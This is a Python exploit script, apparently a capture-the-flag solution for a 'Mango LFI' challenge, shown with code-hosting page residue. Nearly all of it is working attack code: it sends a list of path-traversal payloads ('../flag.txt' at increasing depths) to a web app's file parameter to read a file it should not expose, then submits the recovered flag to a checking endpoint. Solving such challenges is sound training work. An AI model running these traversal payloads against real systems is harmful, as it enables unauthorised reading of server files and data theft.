54 lines
1.7 KiB
Python
54 lines
1.7 KiB
Python
#!/usr/bin/env python3
|
|
"""
|
|
Exploit for Mango LFI Challenge
|
|
Demonstrates Local File Inclusion vulnerability to read /flag.txt
|
|
"""
|
|
|
|
import requests
|
|
import sys
|
|
|
|
def exploit_lfi(base_url):
|
|
"""
|
|
Exploit the LFI vulnerability to read /flag.txt
|
|
"""
|
|
print("[*] Mango LFI Exploit")
|
|
print(f"[*] Target: {base_url}")
|
|
|
|
# Try to read the flag using path traversal
|
|
payloads = [
|
|
"../flag.txt",
|
|
"../../flag.txt",
|
|
"../../../flag.txt",
|
|
"../../../../flag.txt"
|
|
]
|
|
|
|
for payload in payloads:
|
|
print(f"\n[*] Trying payload: {payload}")
|
|
try:
|
|
response = requests.get(f"{base_url}/view", params={"file": payload})
|
|
|
|
if response.status_code == 200 and "GEMASTIK18{" in response.text:
|
|
print(f"[+] SUCCESS! Flag found:")
|
|
print(f"[+] {response.text.strip()}")
|
|
|
|
# Verify the flag
|
|
flag = response.text.strip()
|
|
verify_response = requests.post(f"{base_url}/check", data={"flag": flag})
|
|
if "Correct" in verify_response.text:
|
|
print("[+] Flag verified successfully!")
|
|
return True
|
|
elif response.status_code == 200:
|
|
print(f"[!] File read successful, but no flag found:")
|
|
print(f" {response.text[:100]}...")
|
|
else:
|
|
print(f"[-] Failed with status code: {response.status_code}")
|
|
except Exception as e:
|
|
print(f"[-] Error: {e}")
|
|
|
|
print("\n[-] Flag not found with any payload")
|
|
return False
|
|
|
|
if __name__ == "__main__":
|
|
base_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080"
|
|
exploit_lfi(base_url)
|